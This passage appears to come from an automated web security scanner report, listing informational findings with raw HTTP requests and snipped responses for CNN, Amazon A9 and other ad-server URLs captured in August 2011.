Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 2719
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.36. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053

Request

GET /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:15 GMT
Pragma: no-cache
Content-Length: 3445
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.37. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:37 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:37 GMT
Pragma: no-cache
Content-Length: 934
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7118,7123,7130,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...

18.38. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:36 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:36 GMT
Pragma: no-cache
Content-Length: 3406
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.39. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:36 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:36 GMT
Pragma: no-cache
Content-Length: 3594
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.40. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:37 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:37 GMT
Pragma: no-cache
Content-Length: 940
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7167,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...

18.41. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:36 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:36 GMT
Pragma: no-cache
Content-Length: 4183
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.42. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:37 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:37 GMT
Pragma: no-cache
Content-Length: 940
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7756,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...

18.43. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981

Request

GET /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:40 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:40 GMT
Pragma: no-cache
Content-Length: 3486
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.44. http://bpx.a9.com/amzn/defaultad.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /amzn/defaultad.html

Request

GET /amzn/defaultad.html HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bJcShNvdj16F6DYDYjovIPhCLX94XksgEN48Xf7M3x50soO8DoxsKBap60SqfzCdq5NpNBRJQwi3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"287-1298572872000"
Last-Modified: Thu, 24 Feb 2011 18:41:12 GMT
Content-Type: text/html
Content-Length: 287
Date: Mon, 15 Aug 2011 18:26:14 GMT

<html><body>
<script language='javascript'>

var i=0;
bpxframe = window;

while(i++<10) {

bpxframe = bpxframe.parent;

try{
if(typeof bpxframe.a9_bpx_punt =='function') break;
} catch(e) {}

if(bpx
...[SNIP]...

18.45. http://bpx.a9.com/amzn/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /amzn/iframe.html

Request

GET /amzn/iframe.html?p=81;last=1091;r=663867 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bJcShNvdj16F6DYDYjovIPhCLX94XksgEN48Xf7M3x50soO8DoxsKBap60SqfzCdq5NpNBRJQwi3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"303-1298572231000"
Last-Modified: Thu, 24 Feb 2011 18:30:31 GMT
Content-Type: text/html
Content-Length: 303
Date: Mon, 15 Aug 2011 18:26:26 GMT

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html>
<body scrolling='no' frameborder='0' marginheight='0' marginwidth='0' ma
...[SNIP]...

18.46. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=2.4759&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=9438D1EC-137A-41B9-A85A-FC3DB1591307&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbpx.a9.com%2Famzn%2Fiframe.html&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313426573+ \"d7090a0b-960a-46fe-90f5-5e451fe1ab2c\"+ 70238+ 29835+ 1209]}"; camp_freq_p1="eJzjkuF4PYFNgFFi18yln1gUGDV23V//icWA0QLM55LhOLOOBSi7Hir7GkQDZddDZS/dZQbK9kJlT0JlwXwuEY5Vx0EmL940ESjLoMFgwGDBABTtegUS3fb7z0dk0e5mdgEmiS5kUQAIgzND"; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; io_freq_p1="eJzjEuaYFC/AKLFr5tJPLAaMFmCaS5xjj4sAk8R6EEeBQYPBgMmiFywhzDE1WYBZYvGmiVAJBgsGoODkNKAR237/+QgXBAC33hmb"; dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"4\": 1313426573}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Type: text/html
Content-Length: 2934
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787929/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.i
...[SNIP]...

18.47. http://creativeby1.unicast.com/script/V3.00/deliver2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativeby1.unicast.com
Path:   /script/V3.00/deliver2.html

Request

GET /script/V3.00/deliver2.html?pid=75332&cid=14414&pub=702&a=458356&VwDebug=false&pc=458317&exp=%27082811%27&fc=false&sc=false&png='http%253A//ping1.unicast.com/adstracking.gif%253FDV%253D3.80%2526PT%253DI%2526AD%253D458356%2526VD%253D0%2526AV%253D_AV_%2526PV%253D_PV_%2526CV%253D_CV_%2526RV%253D_RV_%2526UV%253D_UV_%2526UC%253D_UC_%2526VP%253D0.0.0.0%2526VU%253D_VU_%2526RD%253D1733442____CH%253D'&pip=''&tpi='http%253A//ad.doubleclick.net/imp%253Bv1%253Bf%253B242163176%253B0-0%253B0%253B64903877%253B1%257C1%253B42468572%257C42486359%257C1%253B%253Bcs%253De%253Bpc%253D%255BTPAS_ID%255D%253B%25253fhttp%253A//ad.doubleclick.net/dot.gif%253F%3F1313432776687'&rd=0.5794542958028615 HTTP/1.1
Host: creativeby1.unicast.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
